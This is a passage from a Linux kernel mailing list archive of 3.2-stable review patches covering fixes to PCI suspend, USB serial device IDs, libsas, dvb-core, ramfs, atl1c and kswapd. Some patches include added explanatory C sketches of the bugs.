quiesced by the OS.  Nothing's wrong with this, but the BIOS does it
by checking that the PCI COMMAND registers contain 0 without checking
the controllers' power state.  If the register isn't 0, the BIOS
assumes the controller needs to be quiesced and tries to do so.  This
involves making various MMIO accesses to the controller, which don't
work very well if the controller is already in D3.  The end result is
a system hang or memory corruption.

Since the value in the PCI COMMAND register doesn't matter once the
controller has been suspended, and since the value will be restored
anyway when the controller is resumed, we can work around the BIOS bug
simply by setting the register to 0 during system suspend.  This patch
(as1590) does so and also reverts the second commit mentioned above,
which is now unnecessary.
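
The interaction between the BIOS check and the workaround can be modelled roughly as below. This is a sketch under the assumptions stated in the description above; the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct ehci_sketch {
	uint16_t pci_command;	/* value of the PCI COMMAND register */
	bool in_d3;		/* controller is in the D3 power state */
};

/* Buggy BIOS check: looks only at COMMAND, never at the power state. */
static bool bios_touches_mmio(const struct ehci_sketch *c)
{
	return c->pci_command != 0;
}

/* Returns true if the BIOS would access MMIO on a controller in D3. */
static bool suspend_goes_wrong(uint16_t pci_command, bool apply_workaround)
{
	struct ehci_sketch c = { pci_command, false };

	c.in_d3 = true;			/* controller is suspended first */
	if (apply_workaround)
		c.pci_command = 0;	/* what the patch writes on suspend */

	return c.in_d3 && bios_touches_mmio(&c);
}
```

Zeroing the register makes the BIOS believe the controller is already quiesced, so it no longer attempts the MMIO accesses that fail in D3.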

In theory we could do this for every PCI device.  However to avoid
introducing new problems, the patch restricts itself to EHCI host
controllers.

Finally the affected systems can suspend with USB wakeup working
properly.

Reference: https://bugzilla.kernel.org/show_bug.cgi?id=37632
Reference: https://bugzilla.kernel.org/show_bug.cgi?id=42728
Based-on-patch-by: AceLan Kao 
Signed-off-by: Alan Stern 
Tested-by: Dâniel Fraga 
Tested-by: Javier Marcet 
Tested-by: Andrey Rahmatullin 
Tested-by: Oleksij Rempel 
Tested-by: Pavel Pisa 
Acked-by: Bjorn Helgaas 
Acked-by: Rafael J. Wysocki 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/pci/pci-driver.c |   12 
 drivers/pci/pci.c|5 -
 drivers/pci/quirks.c |   26 --
 include/linux/pci.h  |2 --
 4 files changed, 12 insertions(+), 33 deletions(-)

diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
index bf0cee6..099f46c 100644
--- a/drivers/pci/pci-driver.c
+++ b/drivers/pci/pci-driver.c
@@ -748,6 +748,18 @@ static int pci_pm_suspend_noirq(struct device *dev)
 
pci_pm_set_unknown_state(pci_dev);
 
+   /*
+* Some BIOSes from ASUS have a bug: If a USB EHCI host controller's
+* PCI COMMAND register isn't 0, the BIOS assumes that the controller
+* hasn't been quiesced and tries to turn it off.  If the controller
+* is already in D3, this can hang or cause memory corruption.
+*
+* Since the value of the COMMAND register doesn't matter once the
+* device has been suspended, we can safely set it to 0 here.
+*/
+   if (pci_dev->class == PCI_CLASS_SERIAL_USB_EHCI)
+   pci_write_config_word(pci_dev, PCI_COMMAND, 0);
+
return 0;
 }
 
diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
index 77cb54a..447e834 100644
--- a/drivers/pci/pci.c
+++ b/drivers/pci/pci.c
@@ -1744,11 +1744,6 @@ int pci_prepare_to_sleep(struct pci_dev *dev)
if (target_state == PCI_POWER_ERROR)
return -EIO;
 
-   /* Some devices mustn't be in D3 during system sleep */
-   if (target_state == PCI_D3hot &&
-   (dev->dev_flags & PCI_DEV_FLAGS_NO_D3_DURING_SLEEP))
-   return 0;
-
pci_enable_wake(dev, target_state, device_may_wakeup(&dev->dev));
 
error = pci_set_power_state(dev, target_state);
diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index 194b243a..2a75216 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -2929,32 +2929,6 @@ static void __devinit disable_igfx_irq(struct pci_dev *dev)
 DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x0102, disable_igfx_irq);
 DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x010a, disable_igfx_irq);
 
-/*
- * The Intel 6 Series/C200 Series chipset's EHCI controllers on many
- * ASUS motherboards will cause memory corrupt

[ 030/108] USB: option: Add MEDIATEK product ids

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Gaosen Zhang 

commit aacef9c561a693341566a6850c451ce3df68cb9a upstream.

Signed-off-by: Gaosen Zhang 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/serial/option.c |   20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
index 167aed8..417ab1b 100644
--- a/drivers/usb/serial/option.c
+++ b/drivers/usb/serial/option.c
@@ -497,6 +497,15 @@ static void option_instat_callback(struct urb *urb);
 
 /* MediaTek products */
 #define MEDIATEK_VENDOR_ID 0x0e8d
+#define MEDIATEK_PRODUCT_DC_1COM   0x00a0
+#define MEDIATEK_PRODUCT_DC_4COM   0x00a5
+#define MEDIATEK_PRODUCT_DC_5COM   0x00a4
+#define MEDIATEK_PRODUCT_7208_1COM 0x7101
+#define MEDIATEK_PRODUCT_7208_2COM 0x7102
+#define MEDIATEK_PRODUCT_FP_1COM   0x0003
+#define MEDIATEK_PRODUCT_FP_2COM   0x0023
+#define MEDIATEK_PRODUCT_FPDC_1COM 0x0043
+#define MEDIATEK_PRODUCT_FPDC_2COM 0x0033
 
 /* Cellient products */
 #define CELLIENT_VENDOR_ID 0x2692
@@ -1246,6 +1255,17 @@ static const struct usb_device_id option_ids[] = {
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a1, 0xff, 0x02, 0x01) },
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a2, 0xff, 0x00, 0x00) },
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a2, 0xff, 0x02, 0x01) }, /* MediaTek MT6276M modem & app port */
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_5COM, 0xff, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_5COM, 0xff, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM, 0xff, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM, 0xff, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_7208_1COM, 0x02, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_7208_2COM, 0x02, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_FP_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_FP_2COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_FPDC_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_FPDC_2COM, 0x0a, 0x00, 0x00) },
{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MEN200) },
{ } /* Terminating entry */
 };


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 027/108] gpiolib: wm8994: Pay attention to the value set when enabling as output

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mark Brown 

commit 8cd578b6e28693f357867a77598a88ef3deb6b39 upstream.

wm8994_gpio_direction_out() ignored the value argument: it switched the
pin to output but never programmed the requested level, so the hardware
did not reflect what the caller asked for.  Set the level bit together
with the direction bit.
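
A minimal user-space sketch of the idea, assuming a read-modify-write
helper in the style of wm8994_set_bits().  The toy_* names and the two
bit values are illustrative assumptions, not copied from the driver; the
only property taken from the patch is that a cleared direction bit means
"output".

```c
#include <stdint.h>

#define TOY_GPN_DIR 0x8000u  /* illustrative: 1 = input, 0 = output */
#define TOY_GPN_LVL 0x0040u  /* illustrative: output level bit */

/* Read-modify-write: replace the bits selected by mask with val. */
static uint16_t toy_set_bits(uint16_t reg, uint16_t mask, uint16_t val)
{
	return (uint16_t)((reg & ~mask) | (val & mask));
}

/* Switch a pin to output and drive the requested level in one update. */
static uint16_t toy_direction_out(uint16_t reg, int value)
{
	/* Any non-zero value is normalised to the level bit. */
	uint16_t lvl = value ? TOY_GPN_LVL : 0;

	return toy_set_bits(reg, TOY_GPN_DIR | TOY_GPN_LVL, lvl);
}
```

Because both bits are in the mask, a request for level 0 also clears a
level bit left over from an earlier configuration.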

Signed-off-by: Mark Brown 
Signed-off-by: Linus Walleij 
Signed-off-by: Ben Hutchings 
---
 drivers/gpio/gpio-wm8994.c |    5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/gpio/gpio-wm8994.c b/drivers/gpio/gpio-wm8994.c
index 92ea535..aa61ad2 100644
--- a/drivers/gpio/gpio-wm8994.c
+++ b/drivers/gpio/gpio-wm8994.c
@@ -89,8 +89,11 @@ static int wm8994_gpio_direction_out(struct gpio_chip *chip,
struct wm8994_gpio *wm8994_gpio = to_wm8994_gpio(chip);
struct wm8994 *wm8994 = wm8994_gpio->wm8994;
 
+   if (value)
+   value = WM8994_GPN_LVL;
+
return wm8994_set_bits(wm8994, WM8994_GPIO_1 + offset,
-  WM8994_GPN_DIR, 0);
+  WM8994_GPN_DIR | WM8994_GPN_LVL, value);
 }
 
 static void wm8994_gpio_set(struct gpio_chip *chip, unsigned offset, int value)




[ 035/108] [SCSI] libsas: fix taskfile corruption in sas_ata_qc_fill_rtf

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Dan Williams 

commit 6ef1b512f4e6f936d89aa20be3d97a7ec7c290ac upstream.

fill_result_tf() grabs the taskfile flags from the originating qc which
sas_ata_qc_fill_rtf() promptly overwrites.  The presence of an
ata_taskfile in the sata_device makes it tempting to just copy the full
contents in sas_ata_qc_fill_rtf().  However, libata really only wants
the fis contents and expects the other portions of the taskfile to not
be touched by ->qc_fill_rtf.  To that end store a fis buffer in the
sata_device and use ata_tf_from_fis() like every other ->qc_fill_rtf()
implementation.
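
The difference between copying a whole taskfile and decoding a FIS can
be sketched as follows.  This is a simplified model, not the libata
code: struct toy_taskfile and toy_tf_from_fis() are hypothetical, and
only a few register fields are decoded.  The byte positions used (status
in byte 2, error in byte 3) match the fis[2] and fis[3] accesses in the
patch.

```c
#include <stdint.h>

#define TOY_RESP_FIS_SIZE 24

/* Hypothetical, trimmed-down taskfile: flags are owned by the caller. */
struct toy_taskfile {
	unsigned long flags;
	uint8_t status;                    /* FIS byte 2 */
	uint8_t error;                     /* FIS byte 3 */
	uint8_t lbal, lbam, lbah, device;  /* FIS bytes 4..7 */
};

/* Decode register contents from a device-to-host FIS; never touch flags. */
static void toy_tf_from_fis(const uint8_t *fis, struct toy_taskfile *tf)
{
	tf->status = fis[2];
	tf->error  = fis[3];
	tf->lbal   = fis[4];
	tf->lbam   = fis[5];
	tf->lbah   = fis[6];
	tf->device = fis[7];
}
```

A memcpy() of a complete taskfile would overwrite flags as well, which
is the corruption described above.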

Reported-by: Praveen Murali 
Tested-by: Praveen Murali 
Signed-off-by: Dan Williams 
Signed-off-by: James Bottomley 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
 drivers/scsi/aic94xx/aic94xx_task.c |    2 +-
 drivers/scsi/libsas/sas_ata.c       |   12 ++++++------
 include/scsi/libsas.h               |    6 ++++--
 3 files changed, 11 insertions(+), 9 deletions(-)

--- a/drivers/scsi/aic94xx/aic94xx_task.c
+++ b/drivers/scsi/aic94xx/aic94xx_task.c
@@ -201,7 +201,7 @@ static void asd_get_response_tasklet(str
 
if (SAS_STATUS_BUF_SIZE >= sizeof(*resp)) {
resp->frame_len = le16_to_cpu(*(__le16 *)(r+6));
-   memcpy(&resp->ending_fis[0], r+16, 24);
+   memcpy(&resp->ending_fis[0], r+16, ATA_RESP_FIS_SIZE);
ts->buf_valid_size = sizeof(*resp);
}
}
--- a/drivers/scsi/libsas/sas_ata.c
+++ b/drivers/scsi/libsas/sas_ata.c
@@ -112,12 +112,12 @@ static void sas_ata_task_done(struct sas
if (stat->stat == SAS_PROTO_RESPONSE || stat->stat == SAM_STAT_GOOD ||
((stat->stat == SAM_STAT_CHECK_CONDITION &&
  dev->sata_dev.command_set == ATAPI_COMMAND_SET))) {
-   ata_tf_from_fis(resp->ending_fis, &dev->sata_dev.tf);
+   memcpy(dev->sata_dev.fis, resp->ending_fis, ATA_RESP_FIS_SIZE);
 
if (!link->sactive) {
-   qc->err_mask |= ac_err_mask(dev->sata_dev.tf.command);
+   qc->err_mask |= ac_err_mask(dev->sata_dev.fis[2]);
} else {
-   link->eh_info.err_mask |= ac_err_mask(dev->sata_dev.tf.command);
+   link->eh_info.err_mask |= ac_err_mask(dev->sata_dev.fis[2]);
if (unlikely(link->eh_info.err_mask))
qc->flags |= ATA_QCFLAG_FAILED;
}
@@ -138,8 +138,8 @@ static void sas_ata_task_done(struct sas
qc->flags |= ATA_QCFLAG_FAILED;
}
 
-   dev->sata_dev.tf.feature = 0x04; /* status err */
-   dev->sata_dev.tf.command = ATA_ERR;
+   dev->sata_dev.fis[3] = 0x04; /* status err */
+   dev->sata_dev.fis[2] = ATA_ERR;
}
}
 
@@ -252,7 +252,7 @@ static bool sas_ata_qc_fill_rtf(struct a
 {
struct domain_device *dev = qc->ap->private_data;
 
-   memcpy(&qc->result_tf, &dev->sata_dev.tf, sizeof(qc->result_tf));
+   ata_tf_from_fis(dev->sata_dev.fis, &qc->result_tf);
return true;
 }
 
--- a/include/scsi/libsas.h
+++ b/include/scsi/libsas.h
@@ -159,6 +159,8 @@ enum ata_command_set {
 ATAPI_COMMAND_SET = 1,
 };
 
+#define ATA_RESP_FIS_SIZE 24
+
 struct sata_device {
 enum   ata_command_set command_set;
 struct smp_resp        rps_resp; /* report_phy_sata_resp */
@@ -170,7 +172,7 @@ struct sata_device {
 
struct ata_port *ap;
struct ata_host ata_host;
-   struct ata_taskfile tf;
+   u8 fis[ATA_RESP_FIS_SIZE];
u32 sstatus;
u32 serror;
u32 scontrol;
@@ -486,7 +488,7 @@ enum exec_status {
  */
 struct ata_task_resp {
u16  frame_len;
-   u8   ending_fis[24];  /* dev to host or data-in */
+   u8   ending_fis[ATA_RESP_FIS_SIZE];   /* dev to host or data-in */
u32  sstatus;
u32  serror;
u32  scontrol;




[ 029/108] USB: option: add ZTE MF60

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bjørn Mork  

commit 8e16e33c168a6efd0c9f7fa9dd4c1e1db9a74553 upstream.

The device switches into a composite device when the initial driver CD
is ejected.  The four interfaces are QCDM, AT, QMI/wwan and mass
storage.  Let this driver manage the two serial interfaces:

T:  Bus=02 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 28 Spd=480  MxCh= 0
D:  Ver= 2.00 Cls=00(>ifc ) Sub=00 Prot=00 MxPS=64 #Cfgs=  1
P:  Vendor=19d2 ProdID=1402 Rev= 0.00
S:  Manufacturer=ZTE,Incorporated
S:  Product=ZTE WCDMA Technologies MSM
S:  SerialNumber=x
C:* #Ifs= 4 Cfg#= 1 Atr=c0 MxPwr=500mA
I:* If#= 0 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E:  Ad=81(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=01(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 1 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E:  Ad=82(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=02(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 2 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=qmi_wwan
E:  Ad=83(I) Atr=03(Int.) MxPS=  64 Ivl=2ms
E:  Ad=84(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=03(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 3 Alt= 0 #EPs= 2 Cls=08(stor.) Sub=06 Prot=50 Driver=usb-storage
E:  Ad=04(O) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=85(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
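
The reserved-interface check can be sketched as a bitmask test.  The
names below (toy_blacklist, toy_should_bind) are hypothetical and only
imitate the shape of option_blacklist_info; this is not the driver's own
lookup code.

```c
#include <stdbool.h>

#define TOY_BIT(n) (1UL << (n))

/* Hypothetical equivalent of option_blacklist_info: one bit per interface. */
struct toy_blacklist {
	unsigned long reserved;
};

static const struct toy_blacklist toy_net_intf2 = {
	.reserved = TOY_BIT(2),   /* interface 2: QMI/wwan */
};

/* A serial driver would decline to bind to a reserved interface. */
static bool toy_should_bind(const struct toy_blacklist *bl, unsigned int ifnum)
{
	return !(bl && (bl->reserved & TOY_BIT(ifnum)));
}
```

With this mask, interfaces 0 and 1 are accepted and interface 2 is left
for another driver.  In the listing above, interface 3 has class 08, so
it would not match a vendor-specific (ff/ff/ff) entry in the first
place.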

Signed-off-by: Bjørn Mork 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/serial/option.c |    6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
index adf8ce7..167aed8 100644
--- a/drivers/usb/serial/option.c
+++ b/drivers/usb/serial/option.c
@@ -554,6 +554,10 @@ static const struct option_blacklist_info net_intf1_blacklist = {
.reserved = BIT(1),
 };
 
+static const struct option_blacklist_info net_intf2_blacklist = {
+   .reserved = BIT(2),
+};
+
 static const struct option_blacklist_info net_intf3_blacklist = {
.reserved = BIT(3),
 };
@@ -1099,6 +1103,8 @@ static const struct usb_device_id option_ids[] = {
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1298, 0xff, 0xff, 0xff) },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1299, 0xff, 0xff, 0xff) },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1300, 0xff, 0xff, 0xff) },
+   { USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1402, 0xff, 0xff, 0xff),
+   .driver_info = (kernel_ulong_t)&net_intf2_blacklist },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x2002, 0xff,
  0xff, 0xff), .driver_info = (kernel_ulong_t)&zte_k3765_z_blacklist },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x2003, 0xff, 0xff, 0xff) },




[ 033/108] [media] dvb-core: Release semaphore on error path dvb_register_device()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Santosh Nayak 

commit 82163edcdfa4eb3d74516cc8e9f38dd3d039b67d upstream.

The error path taken when no free minor is available returns without
calling up_write().  Release the semaphore before returning the error
value.
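
A small model of the rule "every exit path releases what it acquired".
The toy locks below only record whether they are held; they stand in for
the mutex and the rw semaphore and are not real synchronisation
primitives.  All names are hypothetical.

```c
#include <errno.h>

/* Toy lock that only records whether it is held (no real blocking). */
struct toy_lock { int held; };

static void toy_acquire(struct toy_lock *l) { l->held = 1; }
static void toy_release(struct toy_lock *l) { l->held = 0; }

#define TOY_MAX_MINORS 4

static struct toy_lock toy_register_lock;  /* stands in for the mutex */
static struct toy_lock toy_minor_rwsem;    /* stands in for the rw semaphore */
static int toy_minor_used[TOY_MAX_MINORS];

/* Returns the allocated minor, or -EINVAL when none is free. */
static int toy_register_device(void)
{
	int minor;

	toy_acquire(&toy_register_lock);
	toy_acquire(&toy_minor_rwsem);

	for (minor = 0; minor < TOY_MAX_MINORS; minor++)
		if (!toy_minor_used[minor])
			break;

	if (minor == TOY_MAX_MINORS) {
		/* Error path: release both locks, inner one first. */
		toy_release(&toy_minor_rwsem);
		toy_release(&toy_register_lock);
		return -EINVAL;
	}

	toy_minor_used[minor] = 1;
	toy_release(&toy_minor_rwsem);
	toy_release(&toy_register_lock);
	return minor;
}
```

Dropping the first toy_release() call in the error branch reproduces the
original bug: the next caller would find toy_minor_rwsem still held.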

Signed-off-by: Santosh Nayak 
Signed-off-by: Mauro Carvalho Chehab 
Signed-off-by: Ben Hutchings 
---
 drivers/media/dvb/dvb-core/dvbdev.c |    1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/media/dvb/dvb-core/dvbdev.c b/drivers/media/dvb/dvb-core/dvbdev.c
index 00a6732..39eab73 100644
--- a/drivers/media/dvb/dvb-core/dvbdev.c
+++ b/drivers/media/dvb/dvb-core/dvbdev.c
@@ -243,6 +243,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
if (minor == MAX_DVB_MINORS) {
kfree(dvbdevfops);
kfree(dvbdev);
+   up_write(&minor_rwsem);
mutex_unlock(&dvbdev_register_lock);
return -EINVAL;
}




[ 042/108] fs: ramfs: file-nommu: add SetPageUptodate()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bob Liu 

commit fea9f718b3d68147f162ed2d870183ce5e0ad8d8 upstream.

There is a bug in the following scenario for !CONFIG_MMU:

 1. create a new file
 2. mmap the file and write to it
 3. read the file: the data written in step 2 is not returned

This happens because of the call chain

  sys_read() -> generic_file_aio_read() -> simple_readpage() -> clear_page()

which causes the page to be zeroed.

Add SetPageUptodate() to ramfs_nommu_expand_for_mapping() so that
generic_file_aio_read() does not call simple_readpage().
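
The effect of the missing flag can be modelled in a few lines.  The
struct and functions below are hypothetical simplifications: a "page" is
a small buffer with an uptodate flag, and the read path falls back to a
zero-filling readpage only when the flag is clear.

```c
#include <stdbool.h>
#include <string.h>

#define TOY_PAGE_SIZE 16

/* Hypothetical page: data plus an "uptodate" flag. */
struct toy_page {
	bool uptodate;
	char data[TOY_PAGE_SIZE];
};

/* Stand-in for the readpage fallback: the page is zero-filled. */
static void toy_readpage(struct toy_page *page)
{
	memset(page->data, 0, sizeof(page->data));
	page->uptodate = true;
}

/* Read path: only fall back to readpage when the page is not uptodate. */
static void toy_file_read(struct toy_page *page, char *buf)
{
	if (!page->uptodate)
		toy_readpage(page);
	memcpy(buf, page->data, sizeof(page->data));
}
```

A page that was written through a mapping but never marked uptodate
loses its contents on the first read; marking it uptodate when it is set
up avoids the fallback.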

Signed-off-by: Bob Liu 
Cc: Hugh Dickins 
Cc: David Howells 
Cc: Geert Uytterhoeven 
Cc: Greg Ungerer 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/ramfs/file-nommu.c |    1 +
 1 file changed, 1 insertion(+)

diff --git a/fs/ramfs/file-nommu.c b/fs/ramfs/file-nommu.c
index fbb0b47..d5378d0 100644
--- a/fs/ramfs/file-nommu.c
+++ b/fs/ramfs/file-nommu.c
@@ -110,6 +110,7 @@ int ramfs_nommu_expand_for_mapping(struct inode *inode, size_t newsize)
 
/* prevent the page from being discarded on memory pressure */
SetPageDirty(page);
+   SetPageUptodate(page);
 
unlock_page(page);
put_page(page);




[ 052/108] atl1c: fix issue of transmit queue 0 timed out

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Cloud Ren 

commit b94e52f62683dc0b00c6d1b58b80929a078c0fd5 upstream.

Some people report that atl1c can cause a system hang with the following
kernel trace:
---
WARNING: at.../net/sched/sch_generic.c:258 dev_watchdog+0x1db/0x1d0()
...
NETDEV WATCHDOG: eth0 (atl1c): transmit queue 0 timed out
...
---
This is caused by calling netif_stop_queue() when the cable link is down.
Remove the netif_stop_queue() call, because link_watch will take over.

Signed-off-by: xiong 
Signed-off-by: Cloud Ren 
Signed-off-by: David S. Miller 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
 drivers/net/ethernet/atheros/atl1c/atl1c_main.c |    1 -
 1 file changed, 1 deletion(-)

--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
@@ -267,7 +267,6 @@ static void atl1c_check_link_status(stru
dev_warn(&pdev->dev, "stop mac failed\n");
atl1c_set_aspm(hw, false);
netif_carrier_off(netdev);
-   netif_stop_queue(netdev);
atl1c_phy_reset(hw);
atl1c_phy_init(&adapter->hw);
} else {




[ 063/108] mm: fix lost kswapd wakeup in kswapd_stop()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Aaditya Kumar 

commit 1c7e7f6c0703d03af6bcd5ccc11fc15d23e5ecbe upstream.

Offlining memory may block forever, waiting for kswapd() to wake up
because kswapd() does not check the event kthread->should_stop before
sleeping.

The proper pattern, from Documentation/memory-barriers.txt, is:

   ---  waker  ---
   event_indicated = 1;
   wake_up_process(event_daemon);

   ---  sleeper  ---
   for (;;) {
  set_current_state(TASK_UNINTERRUPTIBLE);
  if (event_indicated)
 break;
  schedule();
   }

   set_current_state() may be wrapped by:
  prepare_to_wait();

In the kswapd() case, event_indicated is kthread->should_stop.

  === offlining memory (waker) ===
   kswapd_stop()
  kthread_stop()
 kthread->should_stop = 1
 wake_up_process()
 wait_for_completion()

  ===  kswapd_try_to_sleep (sleeper) ===
   kswapd_try_to_sleep()
  prepare_to_wait()
   .
   .
  schedule()
   .
   .
  finish_wait()

The schedule() needs to be protected by a test of kthread->should_stop,
which is wrapped by kthread_should_stop().
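
The guarded sleep can be sketched in single-threaded user-space C.  This
model is an assumption-laden simplification: struct toy_thread and the
toy_* functions are hypothetical, toy_schedule() only counts how often
the thread would block, and no memory ordering is demonstrated.

```c
#include <stdbool.h>

/* Hypothetical sleeper state; in the kernel this is the kthread. */
struct toy_thread {
	bool should_stop;   /* set by the waker before it wakes us */
	int  times_slept;   /* counts calls that would block in schedule() */
};

/* Stand-in for schedule(): here it only counts how often we would block. */
static void toy_schedule(struct toy_thread *t)
{
	t->times_slept++;
}

/* Sleep only if no stop request was posted after we prepared to wait. */
static void toy_try_to_sleep(struct toy_thread *t)
{
	/* prepare_to_wait() would go here: mark ourselves as sleeping first */
	if (!t->should_stop)
		toy_schedule(t);
	/* finish_wait() would go here */
}
```

The order matters: the sleeper state is set first and the stop flag is
tested afterwards, so a stop request posted in between is still seen
before blocking.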

Reproducer:
   Do heavy file I/O in background.
   Do a memory offline/online in a tight loop

Signed-off-by: Aaditya Kumar 
Acked-by: KOSAKI Motohiro 
Reviewed-by: Minchan Kim 
Acked-by: Mel Gorman 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 mm/vmscan.c |    5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/vmscan.c b/mm/vmscan.c
index 6615763..66e4310 100644
--- a/mm/vmscan.c
+++ b/mm/vmscan.c
@@ -2688,7 +2688,10 @@ static void kswapd_try_to_sleep(pg_data_t *pgdat, int order, int classzone_idx)
 * them before going back to sleep.
 */
set_pgdat_percpu_threshold(pgdat, calculate_normal_threshold);
-   schedule();
+
+   if (!kthread_should_stop())
+   schedule();
+
set_pgdat_percpu_threshold(pgdat, calculate_pressure_threshold);
} else {
if (remaining)




[ 059/108] target: Clean up returning errors in PR handling code

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Roland Dreier 

commit d35212f3ca3bf4fb49d15e37f530c9931e2d2183 upstream.

 - instead of (PTR_ERR(file) < 0) just use IS_ERR(file)
 - return -EINVAL instead of EINVAL
 - all other error returns in target_scsi3_emulate_pr_out() use
   "goto out" -- get rid of the one remaining straight "return."
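
The first item can be illustrated with user-space imitations of the
error-pointer helpers.  The toy_* functions are assumptions written for
this sketch; they follow the usual convention that the top 4095 address
values encode negative errno codes, but they are not the kernel
definitions.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_MAX_ERRNO 4095

/* User-space imitations of ERR_PTR(), PTR_ERR() and IS_ERR(). */
static void *toy_err_ptr(long error)
{
	return (void *)(intptr_t)error;
}

static long toy_ptr_err(const void *ptr)
{
	return (long)(intptr_t)ptr;
}

static bool toy_is_err(const void *ptr)
{
	return (uintptr_t)ptr >= (uintptr_t)-TOY_MAX_ERRNO;
}

/* Mirror of the fixed return expression: real errno, else -ENOENT. */
static int toy_open_error(const void *file)
{
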